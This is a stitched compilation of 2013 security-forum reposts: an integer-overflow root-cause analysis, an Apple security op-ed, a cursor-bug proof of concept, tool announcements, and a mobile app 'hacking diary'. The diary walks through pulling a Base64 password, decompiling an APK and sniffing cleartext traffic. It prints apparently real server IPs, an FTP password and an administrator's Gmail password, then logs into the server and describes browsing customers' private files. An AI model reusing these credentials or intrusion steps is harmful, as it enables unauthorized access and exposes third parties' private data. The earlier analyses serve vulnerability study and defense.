Interesting. It appears that we're performing signed multiplication of the value contained in esi (0x4) and our "Number of Entries" element within the "stsz" atom (as pointed to by our stack entry located at 0x0012bdb0). This makes sense since Calloc, as we had previously discussed, will perform an allocation of data with a size of (Number of Elements * Size of Elements). However, there seems to be a problem with our math. When multiplying 0x80000027 * 0x4, our result should be 0x20000009C rather than 0x0000009C. The reason for this is that we're attempting to store a value larger than what our 32 bit register can hold. When doing so, an integer overflow occurs and our result is "wrapped," causing only the 32 least significant bits to be stored in our register. With this, we can control the size of our allocations by manipulating the value contained within our "Number of Entries" element. By allocating a chunk smaller than the data we intend to write, we can trigger a heap overflow. However, the root cause of our issue is not exactly as clear as it may seem.
When we looked at our function in IDA Pro earlier, we determined that rather than using the CRT version of calloc (msvcrt!calloc), GOM used a wrapped version instead. Had the actual Calloc function been used, this vulnerability would not exist. To explain this, let's take a look at the code snippet below:

#include <stdio.h>
#include <malloc.h>

int main( void )
{
    int size = 0x4;          // Size of Element
    int num = 0x80000027;    // Number of Elements
    int *buffer;

    printf( "Attempting to allocate a buffer with size: 0x20000009C\n" );
    buffer = (int *)calloc( size, num ); // Size of Element * Number of Elements

    if( buffer != NULL )
        printf( "Allocated buffer with size (0x%X)\n", _msize(buffer) );
    else
        printf( "Failed to allocate buffer.\n" );

    free( buffer );
}

The example above demonstrates a valid (albeit not the best) use of Calloc. Here we're trying to allocate an array with a size of 0x20000009C (0x4 * 0x80000027). Let's see what would happen if we were to compile and run this code:

Attempting to allocate a buffer with size: 0x20000009C
Failed to allocate buffer.

Interesting. Calloc will fail to allocate a buffer due to checks intended to detect wrapped values. Under Windows XP SP3, this functionality can be seen in the following 2 instructions.

eax=ffffffe0 ebx=00000000 ecx=00000004 edx=00000000 esi=016ef79c edi=016ef6ee
eip=77c2c0dd esp=0022ff1c ebp=0022ff48 iopl=0 nv up ei pl zr na pe nc
cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00000246
msvcrt!calloc+0x1a:
77c2c0dd f7f1 div eax,ecx
eax=3ffffff8 ebx=00000000 ecx=00000004 edx=00000000 esi=016ef79c edi=016ef6ee
eip=77c2c0df esp=0022ff1c ebp=0022ff48 iopl=0 nv up ei pl zr na pe nc
cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00000246
msvcrt!calloc+0x1c:
77c2c0df 3b450c cmp eax,dword ptr [ebp+0Ch] ss:0023:0022ff54=80000027

Here we can see that the (near) maximum value for a 32 bit register (0xFFFFFFE0) is divided by the first argument supplied to Calloc. The result is then compared against the second value supplied to Calloc. If the second value is larger, Calloc is able to determine that an integer overflow would occur, and it exits. However, the _calloc function found in the GSFU module, unlike msvcrt!calloc, does not contain this check. Take a look at the following example:

#include <stdio.h>
#include <malloc.h>

size_t _calloc( size_t num, size_t size )
{
    size_t total = num * size; // Integer overflow occurs here
    return (total);
}

int main( void )
{
    int size = 4;            // Size of Element
    int num = 0x80000027;    // Number of Elements
    int *buffer;

    int chunk_size = _calloc( size, num );
    printf( "Attempting to allocate a buffer with size: 0x%X\n", chunk_size );
    buffer = (int *)malloc( chunk_size );

    if( buffer != NULL )
        printf( "Allocated buffer with size (0x%X)\n", _msize(buffer) );
    else
        printf( "Failed to allocate buffer.\n" );

    free( buffer );
}

Here we can see that instead of using the actual calloc function, we're multiplying our two values ("Element Size" and "Number of Elements") and storing the result in a variable called "chunk_size". That value is then supplied as the size argument to malloc. Using the values from our mutated seed, let's take a look at our sample program's output:

Attempting to allocate a buffer with size: 0x9C
Allocated buffer with size (0x9C)

As we expected, the application readily accepts our wrapped value (0x9C) and provides it as the size argument to malloc. This in turn causes our buffer to be undersized, allowing our heap overflow to occur.
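For reference, the missing check is cheap to add. Below is a sketch of an overflow-safe calloc-style wrapper, modeled on the div/cmp pair shown above; this is a reconstruction for illustration, not GOM's or Microsoft's actual code.

#include <stdint.h>
#include <stdlib.h>
#include <string.h>

/* Refuse the allocation when num * size cannot be represented in a
   size_t, instead of silently wrapping to a small value
   (0x80000027 * 4 -> 0x9C on a 32-bit platform). */
void *checked_calloc( size_t num, size_t size )
{
    if( size != 0 && num > SIZE_MAX / size )
        return NULL;                  /* product would wrap: fail the request */

    void *p = malloc( num * size );   /* product is now known to fit */
    if( p != NULL )
        memset( p, 0, num * size );   /* calloc semantics: zero-initialize */
    return p;
}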
FULL ARTICLE: https://www.corelan.be/index.php/2013/07/02/root-cause-analysis-integer-overflows/
-
Apple's security strategy: make it invisible

Rich Mogull @rmogull

When I received an invitation to the keynote event at Apple's Worldwide Developers Conference, my first reaction was, "Why?" I'm known as a security guy, which means my keynote invites come only when major security features are released. But as I watched the presentations, I began to understand why. Among the many new features in iOS and OS X that the company discussed, two security-related ones received extended attention: iCloud Keychain and Activation Lock. And as I thought about the demos of those and other new features in the days that followed, I came to realize something about the company's approach to security that I hadn't thought about before.

The human factor

Apple is famously focused on design and human experience as its top guiding principles. When it comes to security, that focus created a conundrum. Security is all about placing obstacles in the way of attackers, but (despite the claims of security vendors) those same obstacles can get in the way of users, too. For many years, Apple tended to choose good user experience at the expense of leaving users vulnerable to security risks. Take passwords, for example: As essential as they are to protecting us and our devices, they are one of the most universally despised things about using technology. (I've ranted about passwords elsewhere.)

That strategy worked for a long time, in part because Apple's comparatively low market share made its products less attractive targets. But as Apple products began to gain in popularity, many of us in the security business wondered how Apple would adjust its security strategies to its new position in the spotlight. As it turns out, the company not only handled that change smoothly, it has embraced it. Despite a rocky start, Apple now applies its impressive design sensibilities to security, playing the game its own way and in the process changing our expectations for security and technology.

Pragmatic design

While Apple hasn't said so explicitly, it's clear that one key principle guides it when it comes to security: The more you impede a user's ability to do something, the more likely that user is to circumvent security measures. There were three good examples in the company's WWDC keynote:

iCloud Keychain: When Apple first announced iCloud Keychain, I was initially perplexed. Why add a password manager to the operating system and default browser when there are plenty of third-party applications that do this, and it isn't a feature users are screaming for? Then I realized that Apple was tackling a real-world security issue by trying to make that issue simply go away for the average user. Apple certainly can't stop the onslaught of phishing attacks. But it can add a built-in, cloud-based password manager that both reduces security risks and improves the user experience. That addition enables users to use complex, site-specific passwords, and those passwords will—with no user effort—synchronize across all of their devices and be available whenever they're needed (assuming those users use Apple products only, of course).
With the deep browser integration demonstrated at WWDC, it appears users won't have to manage plugins or even click extra buttons to decide when they need to use the tool; it seems to pop up exactly when they need it, making it easier to use a Keychain-created password than to enter one manually. That's applying human design principles to solve a security problem and improve the overall user experience. No extra software to install, no plugins to manage, no buttons to remember to click. iCloud Keychain might not be good enough for power users, but it will bring the power of password management to the masses.

Activation Lock: The theft of iDevices is rampant throughout the world. While we might blame Apple for producing such desirable products, the company clearly doesn't want people to have to hide their devices in fake BlackBerry cases to use them in public without fear. Phone carriers could dramatically reduce theft by refusing to activate stolen phones (every cellular-enabled device has a unique hardware ID), but so far they have been slow to act. Even if domestic carriers did create a registry, it's unlikely all foreign carriers would, and bad guys would simply ship phones overseas. Activation Lock takes that decision out of carriers' hands and instead applies a global solution. Barring new hacking techniques, phones tied to iCloud accounts will be unusable once stolen. Users don't really need to do anything other than possess a free iCloud account. There's no carrier lock-in, registration, paperwork, or other obstacles to using it. The feature has the potential to reduce device theft at no additional cost to consumers. So, once again, Apple is tackling a real-world problem without sacrificing the user experience. (Only time will tell how effective it is.)

Gatekeeper and the Mac App Store: As I've written previously, Gatekeeper combines sandboxing, the Mac App Store, and code-signing to dramatically reduce the chance a user can be tricked into installing malware. This builds on the success of iOS's extreme sandboxing and reliance on the App Store, which have prevented widespread malware from ever appearing on that platform. Again, Apple addressed the user side of the problem. It didn't rely on deep security technologies that users could be tricked into circumventing. Rather, by pushing users to rely on applications from the Mac App Store and by providing strong incentives (like easier updates and no additional cost per computer), the company reduced the need to manually download apps from different locations. Apple then added Gatekeeper so users wouldn't accidentally install applications from untrusted sources. This approach attacks the economics of malware while minimally impacting the user experience. A large percentage of users never need to think about where their software comes from or worry about being tricked into installing something bad.

Invisible and practical

You'll see evidence of this same approach elsewhere in the Apple ecosystem. With FileVault 2, Apple provided full disk encryption for users to protect lost laptops. But at the same time, the technology allows users to safely and freely recover their system if they accidentally lock themselves out (without giving the NSA a back door). XProtect provides invisible, basic antimalware protection to all Macs, without the intrusiveness or cost normally associated with antivirus tools.
Java in the browser is automatically disabled unless a user explicitly needs it; this introduces a small hurdle, while again minimizing the biggest attack path against current Macs. iOS will soon strongly encrypt all app data, while continuing the tight app isolation that effectively eliminates most forms of attack. These tight controls might frustrate some advanced technology users, and certainly frustrate security vendors. But they also provide a safe user experience that's proven itself effective over the past five years. The consistent thread through all these advances is Apple attempting, wherever possible, to use security to improve the user experience and make common security problems simply go away. By focusing so much on design, Apple increases the odds users will adopt these technologies and thus stay safer.

Source: Apple's security strategy: make it invisible | Macworld
-
[h=2]Changing the cursor shape in Windows proven difficult by NVIDIA (and AMD)[/h]

If you work in the software engineering or information security field, you should be familiar with all sorts of software bugs – the functional and logical ones, those found during the development and internal testing along with those found and reported by a number of complaining users, those that manifest themselves in the form of occasional, minor glitches in your system's logic and those that can lose your company 440 million US dollars in 30 minutes; not to mention bugs which can enable attackers to remotely execute arbitrary code on your computer without you even realizing it. While the latter type of issues is usually of most interest to security professionals and 0-day brokers (not all developers, though) and thus the primary subject of this blog, this post is about something else – the investigation of a non-security (and hardly functional) bug I originally suspected win32k.sys for, but eventually discovered was a problem in the NVIDIA graphics card device drivers.

Figure 1. My typical work window order, with vim present in the background.

To give you some background, I am a passionate user of vim for Windows (gvim, specifically). When working with code, my usual set up for one of the monitors is a black-themed vim window set for full-screen, sometimes with other smaller windows on top when coding happens to be preempted with some other tasks. The configuration is illustrated in Figure 1 at a slightly smaller scale. A few weeks ago, I noticed that when moving the mouse cursor from the vim window over the border of the foreground window (Process Explorer in the example) and inside it, the cursor would occasionally be rendered with colorful artifacts while changing shape. Interestingly, these artifacts would only show up for a fraction of a second and only during one in a hundred (loose estimate) hovers from vim to another window. Due to the fact that the condition was so rare, difficult to reproduce manually and hardly noticeable even when it occurred, I simply ignored it at the time, swamped with work more important than some random pixels rendered for a few milliseconds once or twice a day.

Once I eventually found some spare time last week, I decided to thoroughly investigate the issue and find out the root cause of this weird behavior. I was primarily motivated by the fact that colorful artifacts appearing on the display could indicate unintended memory being rendered by the system, with the potential of pixels representing uninitialized kernel memory (thus making it a peculiar type of information disclosure vulnerability). Both Gynvael and I have found similar issues in the handling of image file formats by popular web browsers in the past, so the prospect of disclosing random kernel bytes seemed tempting and not too far off. Furthermore, I knew it was a software problem rather than something specific to one hardware configuration, as I accidentally encountered the bug on three different Windows 7 and 8 machines I use for my daily work.

Following a brief analysis, it turned out I was not able to reproduce the issue using any background window other than vim. While I started considering if this could be a bug in vim itself, I tested several more windows (moving the mouse manually for a minute or two) and finally found that Notepad worked equally well in the role of a background. Not a vim bug, hurray!
As both windows share the same cursor shape while in edit mode – the I-beam – I concluded the bug must be specific to switching from this particular shape to some other one. Precisely, while hovering the mouse over two windows and their boundary, the cursor switches from the I-beam to a horizontal resize cursor and later to a normal arrow. Relying on the assumption that the bug is a race condition (or at least timing related, as the problem only manifested while performing rapid mouse movements), I wrote the following proof of concept code to reproduce the problem in a more reliable manner (full source code here):

LRESULT CALLBACK WndProc(HWND hwnd, UINT msg, WPARAM wparam, LPARAM lparam) {
  CONST UINT kTimerId = 1337;
  CONST UINT kIterations = 100;
  static HCURSOR cursor[3];

  switch (msg) {
    case WM_CREATE:
      // Load cursors.
      cursor[0] = LoadCursor(NULL, IDC_IBEAM);
      cursor[1] = LoadCursor(NULL, IDC_SIZEWE);
      cursor[2] = LoadCursor(NULL, IDC_ARROW);

      // Set up initial timer.
      SetTimer(hwnd, kTimerId, 1, NULL);
      break;

    case WM_TIMER:
      // Rapidly change cursors.
      for (UINT i = 0; i < kIterations; i++) {
        SetCursor(cursor[0]);
        SetCursor(cursor[1]);
        SetCursor(cursor[2]);
      }

      // Re-set timer.
      SetTimer(hwnd, kTimerId, 1, NULL);
      break;
[...]

Full article: http://j00ru.vexillium.org/?p=1980
-
MAC Address Scanner

MAC Address Scanner is the free desktop tool to remotely scan and find the MAC address of all systems on your local network. It allows you to scan either a single host or a range of hosts at a time. During the scan, it displays the current status for each host. After completion, you can generate a detailed scan report in HTML/XML/TEXT format.

Note that you can find the MAC address only for systems within your subnet. For all others, you will see the MAC address of the gateway or router. Being a GUI-based tool makes it very easy to use for all levels of users, including beginners. It is fully portable and works on all platforms from Windows XP to Windows 8.

[h=3]Features[/h]

- Quickly find the MAC address of all systems on the network
- Scan single or multiple systems
- Ability to stop the scanning operation at any time
- Color-based representation for successful and failed hosts
- Save the scan report to an HTML/XML/TEXT file
- Free and easy to use tool with a cool GUI interface
- Fully portable and can be run on any Windows system
- Support for local installation & un-installation

[h=3]Screenshots[/h]

Screenshot 1: MAC Address Scanner scanning the hosts and showing the discovered MAC addresses in blue color.
Screenshot 2: HTML-based MAC address scan report generated by MAC Address Scanner.

[h=3]Release History[/h]

Version 1.0 : 7th July 2013 - First public release of MAC Address Scanner

[h=3]Download[/h]

FREE Download MAC Address Scanner v1.0
License : Freeware
Platform : Windows XP, 2003, Vista, Windows 7, Windows 8

Source: MAC Address Scanner : Desktop Tool to Find MAC address of Remote Computers on Local Network | www.SecurityXploded.com
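As an aside on the subnet limitation mentioned above: discovery of this kind is typically ARP-based, and ARP only works on the local segment. A minimal sketch using the Win32 SendARP API follows; this is an assumption about the mechanism, since the tool's actual implementation is not published.

#include <winsock2.h>
#include <iphlpapi.h>
#include <stdio.h>

/* Resolve the MAC address of a single IPv4 host via an ARP request.
   Link against iphlpapi.lib and ws2_32.lib. Off-subnet targets never
   answer ARP directly, which is why such scanners report the gateway's
   MAC for hosts outside the local subnet. */
int main(void)
{
    IPAddr dest = inet_addr("192.168.1.1"); /* example host to query */
    ULONG mac[2];                           /* room for the 6-byte MAC */
    ULONG len = 6;

    if (SendARP(dest, 0, mac, &len) == NO_ERROR && len == 6) {
        BYTE *b = (BYTE *)mac;
        printf("%02X-%02X-%02X-%02X-%02X-%02X\n",
               b[0], b[1], b[2], b[3], b[4], b[5]);
    } else {
        printf("No ARP reply (host down or outside the subnet)\n");
    }
    return 0;
}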
-
Arachni v0.4.3 has been released (Open Source Web Application Security Scanner Framework)

From: Tasos Laskos <tasos.laskos () gmail com>
Date: Sat, 06 Jul 2013 21:59:02 +0300

Hey folks,

There's a new version of Arachni, an Open Source, modular and high-performance Web Application Security Scanner Framework written in Ruby. The change-log is quite sizeable, but some bullet points follow.

For the Framework (v0.4.3):
* Stable multi-Instance scans, taking advantage of SMP/Grid architectures for higher efficiency and performance.
* Automated Grid load-balancing.
* Platform fingerprinting for tailor-made audits, resulting in less bandwidth consumption, less server stress and smaller scan runtimes.

For the Web User Interface (v0.4.1):
* Support for PostgreSQL.
* Support for importing data and configuration from the previous 0.4.2-0.4 packages.

Packages:
* Downgraded to require GLIBC >= 2.12 for improved portability.

For more details about the new release please visit: Version 0.4.3 is out - Arachni - Web Application Security Scanner Framework

Download page: Download - Arachni - Web Application Security Scanner Framework
Homepage - Home - Arachni - Web Application Security Scanner Framework
Blog - Arachni - Web Application Security Scanner Framework
Documentation - https://github.com/Arachni/arachni/wiki
Support - Welcome - Arachni Support
GitHub page - http://github.com/Arachni/arachni
Code Documentation - Documentation for Arachni/arachni (master)
Author - Tasos "Zapotek" Laskos (http://twitter.com/Zap0tek)
Twitter - http://twitter.com/ArachniScanner
Copyright - 2010-2013 Tasos Laskos
License - Apache License v2

Cheers,
Tasos Laskos.

Source: WebApp Sec: Arachni v0.4.3 has been released (Open Source Web Application Security Scanner Framework)
-
[h=1]Mobile Application Hacking Diary Ep.1[/h]

|=--------------------------------------------------------------------=|
|=------------=[ Mobile Application Hacking Diary Ep.1]=--------------=|
|=--------------------------=[ 3 July 2013 ]=-------------------------=|
|=----------------------=[ By CWH Underground ]=--------------------=|
|=--------------------------------------------------------------------=|

######
Info
######

Title  : Mobile Application Hacking Diary Ep.1
Author : ZeQ3uL and diF
Team   : CWH Underground
Date   : 2013-07-03

##########
Contents
##########

[0x00] - Introduction
[0x01] - Application Reconnaissance
  [0x01a] - Insecure Data Storage
  [0x01b] - Decompile Application Package
[0x02] - Man in the Middle Attack
  [0x02a] - Preparation Tools
  [0x02b] - MitM Attack
[0x03] - Server-Side Attack
  [0x03a] - Scanning
  [0x03b] - Gaining Access
  [0x03c] - Bypass Anti-Virus
  [0x03d] - PWNed System !!
  [0x03e] - It's Not Over !!
[0x04] - Greetz To

#######################
[0x00] - Introduction
#######################

"During the past few years, we've seen mobile devices evolve from simple, rather dumb phones to complete, integrated communication devices. As these devices became more intelligent ("smart" phones) and data transfer speeds on mobile networks increased significantly, people no longer used them solely for making phone calls or sending text messages, but started using them for sending email, browsing the Internet, playing games, checking in for flights, or doing online banking transactions.

Companies started creating mobile applications to offer all sorts of services to their clients. Today, mobile applications are available for storing and synchronizing data files in the cloud, participating in social network sites, or even playing with a talking crazy frog.

As the data that is stored, processed, and transferred by these applications can often be considered sensitive, it is important to ensure that the security controls on these mobile devices and applications are effective."

--SANS Penetration Testing Blog

This paper is a narrative and explanation of our penetration testing techniques from the real world, presented as a case study of an Android application test. (Android is a Linux-based platform developed by Google and the Open Handset Alliance; application programming for it is done exclusively in Java, and the Android operating system software stack consists of Java applications running on a Dalvik virtual machine (DVM).) The main functions of the target application work similarly to Apple's famous iCloud: backing up pictures, videos, and contacts and syncing them to a personal cloud system.

Let's Begin!
#####################################
[0x01] - Application Reconnaissance
#####################################

"Usually, a client software package is installed locally on the mobile device which acts as the front-end for the user. Packages are typically downloaded from an app store or market, or provided via the company's website. Similar to non-mobile software, these applications can contain a myriad of vulnerabilities. It is important to note that most testing on the client device usually requires a device that is rooted or jailbroken. For example, the authentic mobile OS will most likely prevent you from having access to all files and folders on the local file system. Furthermore, as software packages can often be decompiled, tampered with or reverse engineered, you may want to use a device that does not pose any restrictions on the software that you can install."
--SANS Penetration Testing Blog

Our first mission is Application Reconnaissance. The objective of this mission is to understand how the application works, to enumerate sensitive information from data stored on local storage, and, by decompiling the application package into source code, to dig out even more information.

+++++++++++++++++++++++++++++++++
[0x01a] - Insecure Data Storage
+++++++++++++++++++++++++++++++++

We started our first mission by building an Android pentest platform (installing the Android SDK, the Android emulator and the Burp Suite proxy) and getting ready to connect to our phone using the Android Debug Bridge (http://developer.android.com/tools/help/adb.html). ADB is a versatile command line tool that lets you communicate with an emulator instance or a connected Android-powered device.

First, we signed up and logged in to the application, then used ADB to connect to the phone in debug mode with the "adb devices" command.

---------------------------------------------------------------
[zeq3ul@12:03:51]-[~]> adb devices
* daemon not running. starting it now *
* daemon started successfully *
List of devices attached
3563772CF3BC00FH device
---------------------------------------------------------------

We then used the "adb shell" command to connect to the phone and explore its internal directories. Before any further exploration, we needed to identify the real name of the application package, which is usually found in the "/data/app/" folder in the form of an ".apk" file. "/data/app/com.silentm.msec-v12.apk" was found to be the package of our target application, so "com.silentm.msec-v12" is the real name of the package. Finally, the folder belonging to the application under "/data/data" is the most likely place for the application's sensitive information to be stored locally. As expected, we found crucial information stored in "/data/data/com.silentm.msec-v12/shared_prefs", as shown below.
---------------------------------------------------------------
[zeq3ul@12:05:24]-[~]> adb shell
# cd /data/data/com.silentm.msec-v12/shared_prefs
# cat PREFS.xml
<?xml version='1.0' encoding='utf-8' standalone='yes'?>
<map>
<string name="Last_added">9</string>
<boolean name="configured" value="true"/>
<string name="package">Trial</string>
<string name="version">1.2</string>
<string name="username">zeq3ul</string>
<string name="password">NXBsdXM0PTEw</string>
<string name="number">089383933283</string>
<string name="supportedextension">{"D":"HTML,XLS,XLSX,XML,TXT,DOC,DOCX,PPT,PDF,ISO,ZIP,RAR,RTF","M":"MP3,MP2,WMA,AMR,WAV,OGG,MMF,AC3","I":"JPEG,JPG,GIF,BMP,PNG,TIFF","V":"3GP,MP4,MPEG,WMA,MOV,FLV,MKV,MPEG4,AVI,DivX"}</string>
...
</map>
---------------------------------------------------------------

We found our username and password stored locally in PREFS.xml. The password seems to be protected with some kind of encryption, but if we take a good look at it we find that it is only a Base64-encoded string, so we can easily decode it to reveal the real password:

"NXBsdXM0PTEw" > "5plus4=10"

TIPS! This is a bad example of how applications should store sensitive data, and encoding a password with Base64 (Encode != Encrypt) is an equally bad idea. The offending code is shown below:

---------------------------------------------------------------
public void saveCredentials(String userName,String password)
{
  SharedPreferences PREFS;
  PREFS=getSharedPreferences(MYPREFS,Activity.MODE_PRIVATE);
  SharedPreferences.Editor editor = PREFS.edit();
  String mypassword = password;
  String base64password = new String(Base64.encodeToString(mypassword.getBytes(),4));
  editor.putString("Username", userName);
  editor.putString("Password", base64password);
  editor.commit();
}
---------------------------------------------------------------
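Just to show how trivial recovery is, here is a minimal stand-alone decoder in C - our own quick illustration, not part of the original app (any Base64 routine, such as android.util.Base64 or the base64 command line tool, would do the same job):

---------------------------------------------------------------
/* Minimal sketch: decode the Base64 value lifted from PREFS.xml to
 * show the "encrypted" password is trivially recoverable. */
#include <stdio.h>

static int b64_val(char c)
{
    if (c >= 'A' && c <= 'Z') return c - 'A';
    if (c >= 'a' && c <= 'z') return c - 'a' + 26;
    if (c >= '0' && c <= '9') return c - '0' + 52;
    if (c == '+') return 62;
    if (c == '/') return 63;
    return -1;                        /* '=' padding or invalid input */
}

int main(void)
{
    const char *stored = "NXBsdXM0PTEw";   /* value from PREFS.xml */
    unsigned char out[64];
    int acc = 0, bits = 0, n = 0;

    for (const char *p = stored; *p != '\0' && *p != '='; p++) {
        int v = b64_val(*p);
        if (v < 0) continue;
        acc = (acc << 6) | v;         /* accumulate 6 bits per character */
        bits += 6;
        if (bits >= 8) {              /* emit a full byte when available */
            bits -= 8;
            out[n++] = (unsigned char)(acc >> bits);
            acc &= (1 << bits) - 1;   /* keep only the leftover bits */
        }
    }
    out[n] = '\0';
    printf("%s\n", (char *)out);      /* prints: 5plus4=10 */
    return 0;
}
---------------------------------------------------------------

Compile it with any C compiler and it prints the cleartext password immediately - Base64 adds no secrecy at all.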
+++++++++++++++++++++++++++++++++++++++++
[0x01b] - Decompile Application Package
+++++++++++++++++++++++++++++++++++++++++

Next, in order to completely understand the mechanism of the application, we needed to obtain its source code. For an Android application, this can be done by decompiling the application's Android package (".apk"). Android packages (".apk" files) are actually simply ZIP files. They contain the AndroidManifest.xml, classes.dex, and resources.arsc, among other components. You can rename the extension and open the file with a ZIP utility such as WinZip to view its contents. We started with the "adb pull" command to extract the Android application from the mobile phone.

---------------------------------------------------------------
[zeq3ul@12:08:37]-[~]> adb pull /data/app/com.silentm.msec-v12.apk
1872 KB/s (5489772 bytes in 2.862s)
---------------------------------------------------------------

The next step was to decompile the ".apk" we just pulled using a tool called dex2jar (http://code.google.com/p/dex2jar/). dex2jar is intended to convert ".dex" files to human-readable ".class" files in Java.

NOTICE! "classes.dex" is stored in every ".apk", as mentioned above. This can be proved by renaming any ".apk" to ".zip" and extracting it; you will then see the structure of an ".apk" for yourself.

---------------------------------------------------------------
[zeq3ul@12:09:11]-[~]> bash dex2jar.sh com.silentm.msec-v12.apk
dex2jar version: translator-0.0.9.8
dex2jar com.silentm.msec-v12.apk -> com.silentm.msec-v12_dex2jar.jar
Done.
---------------------------------------------------------------

JD-GUI (http://java.decompiler.free.fr/?q=jdgui) is our tool of choice for reading the decompiled source (the ".jar" produced by dex2jar) - in this case, "com.silentm.msec-v12_dex2jar.jar".

NOTE: JD-GUI is a standalone graphical utility that displays the Java source code of ".class" files. You can browse the reconstructed source code with JD-GUI for instant access to methods and fields.

As a result, we found that "Config.class" stores smelly hard-coded information in its source, as shown below:

Config.class
---------------------------------------------------------------
package com.silentm.msec;

public class Config
{
  public static final String CONTACT_URL = "http://203.60.240.180/en/Contact.aspx";
  public static final String Check_Memory = "http://203.60.240.180/en/CheckMem.aspx";
  public static final String BackupSMS = "http://203.60.240.180/en/backupsms.aspx";
  public static final String Forgot_Password = "http://203.60.240.180/en/ForgotPassword.aspx";
  public static final String FTP_URL = "203.60.240.183";
  public static final String FTP_User = "msec1s";
  public static final String FTP_Password = "S1lentM!@#$ec";
  public static final String Profile = "http://203.60.240.180/en/Profile.aspx";
  public static final int MAX_MEMORY = 500;
  public static final int LOG_COUNT = 30;
  ...
}
---------------------------------------------------------------

Explain!! The backup URLs and the FTP user and password were found in the source code (W00T W00T !!). Now we know that this application uses the FTP protocol to transfer pictures, SMS and contact information to the cloud server, and that SUCKS!! because the credentials are hard-coded and FTP is not a secure protocol.

###################################
[0x02] - Man in the Middle Attack
###################################

"The second attack surface is the communications channel between the client and the server. Although applications use more and more secured communications for sending sensitive data, this is not always the case. In your testing infrastructure, you will want to include an HTTP manipulation proxy to intercept and alter traffic. If the application does not use the HTTP protocol for its communication, you can use a transparent TCP and UDP proxy like the Mallory tool. By using a proxy, you can intercept, analyze, and modify data that is communicated between the client and the server."
--SANS Penetration Testing Blog

As we found that our target application uses the HTTP protocol, the next step was to set up an HTTP intercepting proxy tool such as ZAP Proxy or Burp Suite (Burp Suite was chosen this time) in order to perform our second mission, a Man in the Middle attack against the application. Having a web proxy intercepting requests is a key piece of the puzzle. From this point forward, our test uses techniques similar to regular web application testing.

We intercepted every HTTP request and response of the application with the Burp Suite proxy (http://www.portswigger.net/burp/). In the HTTP requests we found sensitive information (the username and password) sent to the server side while logging in, because the application uses the HTTP protocol, which sends packets in clear text, as shown below (anyone in the middle of this communication will see that information crystal clear - what a kind app!).
Burpsuite: HTTP Request
---------------------------------------------------------------
POST http://203.60.240.180/en/GetInfo.aspx HTTP/1.1
Content-Length: 56
Content-Type: application/x-www-form-urlencoded
Host: 203.60.240.180
Connection: Keep-Alive
User-Agent: Apache-HttpClient/UNAVAILABLE (java 1.4)

imei=352489051163052&username=zeq3ul&password=5plus4=10
---------------------------------------------------------------

Moreover, in the HTTP response we found information that surprised us: someone's Gmail address and password (we found out later that it belonged to an administrator) were shown right in front of our eyes!

Burpsuite: HTTP Response
---------------------------------------------------------------
HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Date: Fri, 07 June 2013 12:15:37 GMT
Content-Length: 2405

{"AppVersion":"1.2","FTP_USER":"msec1s","FTP_PASS":"S1lentM!@#$ec","FTP_SERVER":"203.60.240.183","MAX_MEMORY":"500","LOG_COUNT":"30","Smtp":"smtp.gmail.com","FromEmail":"mseccloud@gmail.com","FromEmailPwd":"M[Sec)0/",................
---------------------------------------------------------------

As a result, we were able to sniff the username and password in clear text (no SSL nor encryption) and compromise the administrator's email using the address "mseccloud@gmail.com" and the password "M[Sec)0/" that they gave us for free via the HTTP response. :\

#############################
[0x03] - Server-Side Attack
#############################

"In most cases, the server to which the client communicates is one or more web servers. The attack vectors for the web servers behind a mobile application is similar to those we use for regular web sites. Aside from looking for vulnerabilities in the web application, you should also perform host and service scans on the target system(s) to identify running services, followed by a vulnerability scan to identify potential vulnerabilities, provided that such testing is allowed within the scope of the assignment."
--SANS Penetration Testing Blog

++++++++++++++++++++
[0x03a] - Scanning
++++++++++++++++++++

As we found the backend URLs (203.60.240.180 and 203.60.240.183) in the source code, we needed to check the security of the backend systems as well. We started by scanning the targets for open ports using nmap (http://nmap.org).

Nmap Result for 203.60.240.180
---------------------------------------------------------------
[zeq3ul@12:30:54]-[~]> nmap -sV -PN 203.60.240.180

Starting Nmap 6.00 ( http://nmap.org ) at 2013-06-07 12:31 ICT
Nmap scan report for 203.60.240.180
Host is up (0.0047s latency).
Not shown: 998 filtered ports
PORT STATE SERVICE VERSION
80/tcp open http Microsoft IIS httpd 7.0
443/tcp open ssl/http Microsoft IIS httpd 7.0
3389/tcp open ms-wbt-server?
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows

Service detection performed. Please report any incorrect results at http://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 21.99 seconds
---------------------------------------------------------------

Nmap Result for 203.60.240.183
---------------------------------------------------------------
[zeq3ul@12:35:12]-[~]> nmap -sV -PN 203.60.240.183

Starting Nmap 6.00 ( http://nmap.org ) at 2013-06-07 12:35 ICT
Nmap scan report for 203.60.240.183
Host is up (0.0036s latency).
Not shown: 997 filtered ports
PORT STATE SERVICE VERSION
21/tcp open ftp Microsoft ftpd
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows

Service detection performed. Please report any incorrect results at http://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 16.38 seconds
---------------------------------------------------------------

From the scan results we got a list of open ports: IIS and Terminal Services running on 203.60.240.180, and FTP running on 203.60.240.183. It's time to grab the low-hanging fruit.

++++++++++++++++++++++++++
[0x03b] - Gaining Access
++++++++++++++++++++++++++

As we had found the FTP username and password in the source code ("msec1s", "S1lentM!@#$ec"), we were able to access the FTP service running on the server, as shown below:

FTP Server: 203.60.240.183
---------------------------------------------------------------
[zeq3ul@12:40:12]-[~]> ftp 203.60.240.183
Connected to 203.60.240.183
220 Microsoft FTP Service
User <203.60.240.183:<none>>: msec1s
331 Password required
Password:
230 User logged in.
ftp> pwd
257 "/" is current directory.
ftp>
---------------------------------------------------------------

Now that we'd compromised the FTP server using the "msec1s" account, we were able to access all the customers' contacts, pictures, videos, etc. Excitedly, we expected to find some "INTERESTING" pictures or video clips; BUT we found DICK! WTF!! so we got shocked and stopped searching. OTL

 _____________________________________________________________
| NO DICK NO DICK NO DICK NO DICK NO DICK ^^^^^^^^\ |
| NO DICK NO DICK NO DICK NO DICK NO DICK | |
| NO DICK NO DICK NO DICK NO DICK NO DICK |_ __ | |
| NO DICK NO DICK NO DICK NO DICK NO DICK (.(. ) | |
| NO DICK NO DICK NO DICK NO DICK NO DI _ (_ ) | |
| \\ /___/' / |
